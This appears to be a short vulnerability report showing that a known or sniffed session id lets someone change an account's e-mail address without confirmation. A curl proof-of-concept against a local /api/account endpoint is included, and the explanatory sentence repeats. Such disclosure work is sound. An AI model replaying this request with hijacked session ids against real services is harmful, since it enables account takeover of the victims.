With a known session id (from myself or sniffed), it is possible to change the E-Mail address without any confirmation. The following curl command outlines this:
curl --request POST \
--url http://127.0.0.1:8080/api/account \
--header 'content-type: application/json' \
--cookie JSESSIONID={{ YOUR SESSION ID }} \
--data '{"login": "newMail@example.org", "roles": []}'
With a known session id (from myself or sniffed), it is possible to change the E-Mail address without any confirmation. The following curl command outlines this: